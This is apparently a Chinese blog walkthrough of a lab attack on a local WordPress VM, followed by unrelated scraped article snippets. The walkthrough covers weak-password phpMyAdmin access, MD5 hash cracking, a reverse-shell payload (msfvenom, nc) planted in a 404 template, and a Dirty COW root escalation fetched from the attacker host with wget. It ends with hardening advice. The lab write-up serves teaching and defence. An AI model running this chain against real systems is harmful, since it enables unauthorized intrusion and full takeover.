人过留名,雁过留声
人生天地间,凡有大动静处
必有猪头

环境准备

VMware workstation Pro12
Kali 虚拟机 (攻击机IP:10.10.16.133)
Wordpress 虚拟机 (靶机IP:10.10.16.135)
NAT 网络模式

安装靶机

在导入靶机的时候出现版本不兼容的现象。
在这里插入图片描述
用记事本打开靶机安装包里面的 .vmx 文件,修改版本好为本地的 VM 的版本号即可。
在这里插入图片描述
继续尝试导入靶机的时候又提示错误 " 不支持客户机操作系统 centos6-64 ",按照提示的方法去修改靶机的操作系统。(这里修改为 Linux 系统)
在这里插入图片描述
在这里插入图片描述
接着便可导入成功,一开始导入虚拟机的时候选择 " 我以移动该虚拟机 " 即可

1. 信息收集

1.1 主机发现

主机发现可以有以下三种方式获取。

① netdiscover

netdiscover -r 10.10.16.133

在这里插入图片描述

② arp-scan

arp-scan -l 

在这里插入图片描述

③ fping

fping -asg 10.10.16.0/24

在这里插入图片描述
在这里插入图片描述

1.2 端口扫描

参数说明:
-A:详细扫描目标IP,加载所有脚本,尽可能地全面探测信息
-v:显示详细的扫描过程
-sS:利用TCP SYN 扫描
-sV:探测开放
-p-:扫描全部端口
-T4:级别越高速度越快,最高为6级

nmap -A -v -sS -sV -p- 10.10.16.135 

通过端口扫描可以得知靶机开放如下端口。

端口号 对应的服务
22 ssh
80 http
3306 mysql

ps:但凡开放 80\443 端口的都应该目录扫描一波。
在这里插入图片描述

1.3 Web 指纹识别

Wappalyzer是一款浏览器插件,通过Wappalyzer可以识别出网站采用了那种web技术。它能够检测出CMS和电子商务系统、留言板、javascript框架,主机面板,分析统计工具和其它的一些web系统。The company behind Wappalyzer还能够收集web程序的一些信息用于统计分析,揭示出各种web系统的使用率即增长情况。

只要打开网站,Wappalyzer 就能自动识别出 Web 技术信息。

从插件读取的信息可以得出该网站是基于 WordPress 5.0.4 搭建的博客系统,其后端支持语言为 PHP 5.3.3,操作系统为 CentOS,数据库类型为 MySQL。

在这里插入图片描述

2. 漏洞挖掘

2.1 目录扫描

目录扫描工具由很多,如:御剑1.5、DirBuster、Dirsearch、cansina,还有牛人开发的一款 dirmap 。(https://www.freebuf.com/sectool/200890.html)
这里就用 Dirbuster 即可。

① Dirbuster 的打开方式

  1. 直接打开
    在这里插入图片描述

  2. 在命令行中输入 dirbuster 即可打开

② 加载字典

  1. Dirbuster 的安装路径
whereis dirbuster

在这里插入图片描述

  1. bin 目录下一般为存储二进制的文件,所以字典文件应该在第二个路径
    在这里插入图片描述

③ 设置

  1. 在 Target URL 输入要扫描的网站 URL,扫描时将 Work Method 设置为 Auto Switch(HEAD and GET)。
  2. 线程设置为 20-30,(这里选择 20 )太大了容易造成系统死机。
  3. 选择扫描类型,List based brute force(字典暴力破解)。点击Browse选择字典。
  4. 在 Select starting options 中选择 URL Fuzz (URL 模糊测试)方式进行扫描。
  5. 设置 fuzzing 时需要注意,在 URL to fuzz 中输入 /{dir} ,这里的 {dir} 是一个变量,在运行时会被字典中的目录替换掉。如果你扫描的目标是 http://www.xx.com/admin/ ,那么就要在 URL to fuzz 里填写 /admin/{dir}。如果是 /admin/{dir}.php ,则是扫描 admin 目录下的所有 php 文件。

在这里插入图片描述

④ 结果

有两个目录 /phpmyadmin 和 /wp-content
在这里插入图片描述

补:dirb 扫描更方便

使用默认的字典 common.txt ,也可以自定义字典。
在这里插入图片描述

2.2 敏感目录访问

① 访问 phpmyadmin 目录。

在这里插入图片描述

② 尝试用弱口令登录

弱口令登录,可以一个一个去试,要不然就将收集到的弱口令写在一个文件中使用 Burpsuite 中的 intruder 模块去爆破。
得到账号/密码:root/root
在这里插入图片描述

③ 访问 wp-admin 目录(插曲)

  1. 在一开始访问靶机的时候页面没能加载 CSS ,当时就有点疑惑,是不是靶机出问题了,不过还是不放在心上,反正这个靶机漏洞的考察一般不会出现在 CSS 上,所以也就不在意。
    在这里插入图片描述
  2. 访问 wp-admin 目录的时候,再次出现错误,发现页面重定向的主机地址错误(192.168.116.171)。很显然,这绝对不是源码的问题,源码中绝对不可能把重定向的地址写死,那么,那么重定向的地址有可能是存储在数据库中,然后源码去调用而已。
    在这里插入图片描述
  3. 在 phpmyadmin 中发现了两处重定向的地址。刚好也是 192.168.116.171
    在这里插入图片描述
  4. 将数据库中的地址改为靶机的IP即可(10.10.16.135)
    在这里插入图片描述
  5. 重新刷新一下数据库,再次进入靶机,发现 CSS 被加载出来了。
    在这里插入图片描述
  6. wp-admin目录可重定向成功,是一个后台登录页面。
    在这里插入图片描述

3. 漏洞利用

3.1 登录后台

  1. 使用 wordpress 数据库下的 wp_users 表中的用户的信息登录。
    在这里插入图片描述
  2. 这里发现密码被经过加密处理,这里用 md5 在线解密工具解密一下,发现密码是123456。
    在这里插入图片描述
  3. 登录账号/密码:cleverbao/123456
    (ps:当然,有了数据库权限之后也可以对数据库进行增,删,改操作,如果觉得用户名不好听的话。)
    在这里插入图片描述

3.2 反弹 shell

在 外观 / 编辑 / 404模板 处可编辑 404.php 页面的代码。在 404 模板插入反弹 shell 代码即可。

① msf 生成反弹 shell

在 Kali 命令行执行以下命令:
其中 LHOST 是 Kali 的 IP,LPORT 是监听的端口,且将代码保存在 Desktop 的 shell.php 文件中。

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.133 LPORT=4444 -o Desktop/shell.php

在这里插入图片描述

② 直接利用 Kali 自带的反向 shell

cat /usr/share/webshells/php/php-reverse-shell.php

在这里插入图片描述

③ 将代码粘贴在 404.php 中

使用以上两个木马之一都可,这里使用 Kali 自带的。同时要修改主机号和端口,最后点击更新文件即可。
在这里插入图片描述
在这里插入图片描述

④ 监听端口

这里访问错误页面的原因在于可以跳转到网站的 404 页面,从而触发木马,反弹shell。同时监听木马中设置的 4444 端口。

  1. 这里使用 nc(netcat:素有 " 瑞士军刀 " 美誉)监听端口。

netcat 命令解析
-l 监听
-p 监听本地端口
-n 指定 IP地址
-v 熟悉详细信息
-h 帮助文档

nc -nvlp 4444
  1. 同时访问一个不存在的页面
http://10.10.16.135/?p=666
  1. 结果反弹成功!!!
    在这里插入图片描述
  2. 输入 whoami 查看权限,发现当前为 apache 权限,还不是 root 权限。
    (ps: $ 是一般用户权限,# 是 root 权限 )
    在这里插入图片描述

3.3 提权

① 查看操作系统信息

使用 uname 可显示电脑以及操作系统的相关信息。

参数说明:
-a或–all  显示全部的信息。
-m或–machine  显示电脑类型。
-n或-nodename  显示在网络上的主机名称。
-r或–release  显示操作系统的发行编号。
-s或–sysname  显示操作系统名称。
-v  显示操作系统的版本。
–help  显示帮助。
–version  显示版本信息。

在这里插入图片描述

② 脏牛(dirty cow)提权漏洞

漏洞编号:CVE-2016-5195
漏洞危害:低权限用户利用该漏洞技术可以在全版本 Linux 系统上实现本地提权。
漏洞原理:该漏洞具体为,get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者passwd程序就可以达到root的目的。
影响范围:Linux 内核>=2.6.22,并且未打补丁

从上面可以得知靶机的 Linux 版本为 2.6.32 ,存在脏牛提权漏洞。

③ 漏洞测试

  1. 使用官网提供的 exp 进行测试。
https://github.com/FireFart/dirtycow/blob/master/dirty.c
  1. 将 dirty.c 文件下载下来后放在一个文件夹下,这里是放在桌面。
  2. 使用 gcc 编译
gcc -pthread dirty.c -o dirty -lcrypt  
  1. 设置为执行权限
chmod +x dirty
  1. 使用 python 开启 http 服务器
python -m SimpleHTTPServer 80 

在这里插入图片描述

  1. 通过前面反弹的 shell 使用 wget 将 dirty 下载到 /tmp 目录
cd /tmp
wget http://10.10.16.133/dirty

在这里插入图片描述
执行 dirty 文件 同时将管理员的密码修改为 123456

./dirty 123456

在这里插入图片描述
得到一个超级管理员的账号/密码: firefart/123456,使用得到的账号/密码在靶机上登录即可得到 root 权限。
在这里插入图片描述

思路总结

① 红队

  1. 信息收集:主机发现,端口扫描识别端口服务:找到22,80,3306
  2. 漏洞挖掘:目录扫描(爆破),找到敏感目录,包括数据库和网站后台
  3. 漏洞利用:
    ① 手工登录数据库后台,对数据库进行增,删,改操作
    ② 利用数据库中获取得到的账号密码在网站后台登录,上传网站木马(msf生 成shell/kali自带的shell)
    ③执行网站木马获取低权限 shell,判断系统版本寻找提权方法(脏牛提权漏洞)
    ④ 使用官方放出的 exp 进行漏洞测试,获取管理员账号实现 root 提权

② 蓝队

  1. 关闭不需要的端口,遵循最小化原则
  2. 使用常见网站 cms 时,修改默认后台路径
  3. 使用 Phpmyadmin 时,修改默认路径和密码
  4. 升级操作系统版本,不定时打补丁修复漏洞
  5. 关注最新漏洞情报,提升安全运维响应能力
                                                                                                     猪头2020.2.14 
查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. iOS的url编码和解码

    1.url编码ios中http请求遇到汉字的时候,需要转化成UTF-8,用到的方法是:NSString * str = [urlString stringByAddingPercentEscapesUsingEncoding:NSUTF8StringEncoding];2.url解码请求后,返回的数据,如何显示的是这样的格式:%3A%2F%2F,此时需要我们进行UTF-8解码,用到…...

    2024/4/17 21:31:31
  2. Inno Setup 制作安装程序[支持静默安装.NET环境]

    1.贴源码 ; 脚本由 Inno Setup 脚本向导 生成!; 有关创建 Inno Setup 脚本文件的详细资料请查阅帮助文档! #define MyAppName "TestSet"#define MyAppVersion "1.0"#define MyAppPublisher "ZCF"#define MyAppURL "http://www.zcfsky.com…...

    2024/4/17 12:07:13
  3. ClouderaManager java api 有关查询api 使用。

    首先pom中加上此依赖:<dependency><groupId>com.cloudera.api</groupId><artifactId>cloudera-manager-api</artifactId><version>5.14.2</version><dependency><groupId>ch.qos.logback</groupId><artifactI…...

    2024/4/17 12:05:54
  4. Java--使用Base64编码对url传值

    有些时候我们可能需要把信息通过url传递,但是url中出现特殊字符如空格,#,&等符号会使原有的信息失真,还有当传递密码等重要信息的时候可能就需要更复杂的加密解密算法。 这里使用的apache commons项目下的一个改进的base64算法,专门对url重新编码和加密的,如果要是…...

    2024/4/17 12:06:25
  5. EasyUI 中combobox利用拼音进行检索

    combobox利用拼音进行检索准备工作 需要一个pinyin.js代码如下:var arrInitialChart = new Array();arrInitialChart[0]="伌侒俺傲僾儑凒凹厑厫哀哎唉唵啀啊啽嗄嗌嗳嗷嗸嘊噯坳垇垵埃埯堓塧壒奡奥奧婩媪嫒嫯嬡安岇岙岰岸峖嶅嶴庵廒愛慠懊懓扷按挨捱揞擙敖敳昂昹昻暗暧曖枊…...

    2024/4/30 2:54:09
  6. 【20190307】第一个微信小程序

    注:本材料来自微信官方教程,有部分删改 本次实验介绍如何创建第一个小程序,包括新建项目、真机预览和调试、代码提交等内容;然后分析小程序的目录结构。 开发小程序的第一步,你需要拥有一个小程序帐号,通过这个帐号你就可以管理你的小程序。 1. 申请帐号 点击:https://m…...

    2024/4/11 14:29:02
  7. Java 使用 org.apache.tools.zip.* 压缩文件源代码

    Java 使用 org.apache.tools.zip.* 压缩/解压缩文件源代码Java 使用 org.apache.tools.zip.* 压缩/解压缩文件的源代码。本源码支持中文路径和中文文件名;解决了压缩后有一个多余同名文件夹的 bug、压缩后用 7-zip 打开时根目录下的文件名前有“\”的 bug。package com.defond…...

    2024/4/20 2:54:32
  8. ruby URL编码函数

    方法一: require erb puts ERB::Util.url_encode(http://www.qq.com?id=1&name=2)方法二: require uri a = URI::encode(李世民) puts a puts URI::decode(a)...

    2024/4/18 18:35:30
  9. 精仿今日头条微擎小程序手工安装的方法

    适用对象:已经安装微擎【精仿今日头条】公众号版的用户小程序源码百度网盘下载:https://pan.baidu.com/s/1i69MXz3你也可以加入QQ群,在群共享那里下载需要提前准备:1、通过上面的任何一个地址,下载小程序源码2、已经安装微擎精仿今日头条公众号版(小程序后台),如果没有…...

    2024/4/19 9:45:02
  10. 开启dubbo之旅——Dubbo Admin(新版)

    正经学徒,佛系记录,不搞事情根据dubbo官网的指示,来到了Dubbo ops,这个其实可以理解为zookeeper的可视化界面,就像是springcloud的eureka提供的可视化界面,可以直观监控系统的各个服务器情况,既然是监控,那意思就是非必需品,所以看心情使用。话不多说,先到官网提供的…...

    2024/4/18 21:02:25
  11. 复习题

    cookie Cookie是由服务器端生成的,发送给User-Agent(一般是浏览器),(服务器告诉浏览器设置一下Cookie),浏览器会将cookie以key/value 的形式保存在某个目录下的文本文件内,下一次请求同一网站时就发送该Cookie服务器(前提是浏览器设置Cookie) 为什么会有Cookie? htt…...

    2024/4/17 12:06:19
  12. php中文转拼音

    /*** 中文转拼音 (utf8版,gbk转utf8也可用)* @param string $str utf8字符串* @param string $ret_format 返回格式 [all:全拼音|first:首字母|one:仅第一字符首字母]* @param string $placeholder 无法识别的字符占位符* @param string $allow_chars 允许的非中文字符…...

    2024/4/27 8:03:12
  13. 微信小程序解码工具

    项目地址 & 个人博客 起因 前段时间想学习微信小程序开发但是又没有什么深厚前端功底,看到很多很好玩的小程序想要做一个类似的学习学习,所以想着借鉴一下现有的小程序。但是苦于没有源码,抓包也没有办法获取源码。 google后知道可以用安卓模拟器安装微信然后安装小程序…...

    2024/4/17 21:48:16
  14. Hadoop开发常用的API汇总

    HDFS JAVA APIversion 273 HBASE JAVA APIversion 124 MAPREDUCE JAVA APIversion 273HDFS JAVA API(version 2.7.3)HDFS 分布式文件系统JAVA API。与local的java 文件系统的API类似。NameDescriptionorg.apache.hadoop.conf.configurationhadoop中java API使用最多的一个类,很…...

    2024/4/17 12:07:07
  15. zip压缩包解压缩

    12.13.4 ZipInputStream类 ZipInputStream是InputStream的子类,通过此类可以方便地读取ZIP格式的压缩文件,此类的常用方法如表12-22所示。 表12-22 ZipInputStream类的常用方法序 号方 法类 型描 述1public ZipInputStream (InputStream in)构造实例化ZipInput…...

    2024/4/20 1:40:56
  16. 汉字转拼音首字母大写

    汉字转拼音首字母大写 源码: // An highlighted block <!DOCTYPE html> <html lang="en"><head><meta charset="utf-8"><!-- Always force latest IE rendering engine (even in intranet) & Chrome FrameRemove this if …...

    2024/4/17 12:07:01
  17. win7安装程序无法创建新的系统分区

    硬件:thinkpad T450;u盘系统启动盘(使用的是UltraISO软件+win764位操作系统镜像文件.iso制作的) ps:文章中所有截图都是网上找的,基本上没有太大的区别,具体操作界面以自己机子为主问题: 用U盘作启动盘安装系统时,报错:安装程序无法创建新的系统分区....解决: 在网上…...

    2024/4/17 12:07:24
  18. [HBase基础]-- 使用传统hbase的api创建hbase表(scala)

    本地执行主类实现采集hbase表一、使用传统hbase的api创建hbase表(scala本地运行类,并且集群不需要kerberos认证)1、环境准备:idea 16+scala-2.10.4+cdh-spark-1.6.1+jdk-1.7+hbase-1.2.0-cdh5.8.02、导入相关jar包,见pom.xml<?xml version="1.0"encoding=&q…...

    2024/4/17 12:06:07
  19. 小程序入门学习—hello world

    简易教程 起步准备申请账号: 开发小程序首先需要在官网申请一个账号,通过这个帐号你就可以管理你的小程序。点击 连接填写相应信息就可以申请小程序账号。在这个小程序管理平台,你可以管理你的小程序的权限,查看数据报表,发布小程序等操作。申请成功后,登录 https://mp.we…...

    2024/4/17 12:07:12
  20. URL中特殊字符(+?%#&=/)的处理

    在url中直接使用一些特殊字符,在服务器端接收的时候经常出现数据丢失的情况。 那么哪些字符能够直接被服务器识别,哪些有不能呢? 字符“a-z”,”A-Z”,”0-9”,”.”,”-“,”_”,”*”都会直接被服务器识别,维持原值。 然而,字符”+”,”/”,”?”,”%”,”#”,”&am…...

    2024/4/29 12:40:05

最新文章

  1. Java基础知识总结(82)

    ConcurrentHashMap JDK 1.7中的ConcurrentHashMap 原理&#xff1a; JDK 1.7的ConcurrentHashMap的锁机制基于粒度更小的分段锁&#xff0c;分段锁其实是一种锁的设计&#xff0c;并不是具体的一种锁&#xff0c;对于ConcurrentHashMap而言&#xff0c;分段锁技术将Key分成一…...

    2024/5/1 7:56:35
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. Ubuntu磁盘扩容

    使用 df -h命令查看系统磁盘控件的使用情况&#xff1a; [samspobosrv:~]$ df -h Filesystem Size Used Avail Use% Mounted on udev 7.8G 0 7.8G 0% /dev tmpfs 1.6G 1.7M 1.…...

    2024/5/1 4:24:23
  4. 《c++》多态案例一.电脑组装

    一.代码展示 #include <iostream> using namespace std; class CPU { public://抽象计算函数virtual void calculate() 0;};class CVideoCard { public://抽象显示函数virtual void display() 0;}; class Memory { public://抽象存储函数virtual void storage() 0;};…...

    2024/4/30 4:16:58
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/4/29 23:16:47
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/4/30 18:14:14
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/4/29 2:29:43
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/4/30 18:21:48
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/4/27 17:58:04
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/4/27 14:22:49
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/4/28 1:28:33
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/4/30 9:43:09
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/4/27 17:59:30
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/4/25 18:39:16
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/4/28 1:34:08
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/4/26 19:03:37
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/4/29 20:46:55
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/4/30 22:21:04
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/1 4:32:01
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/4/27 23:24:42
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/4/28 5:48:52
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/4/30 9:42:22
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/4/30 9:43:22
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/4/30 9:42:49
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

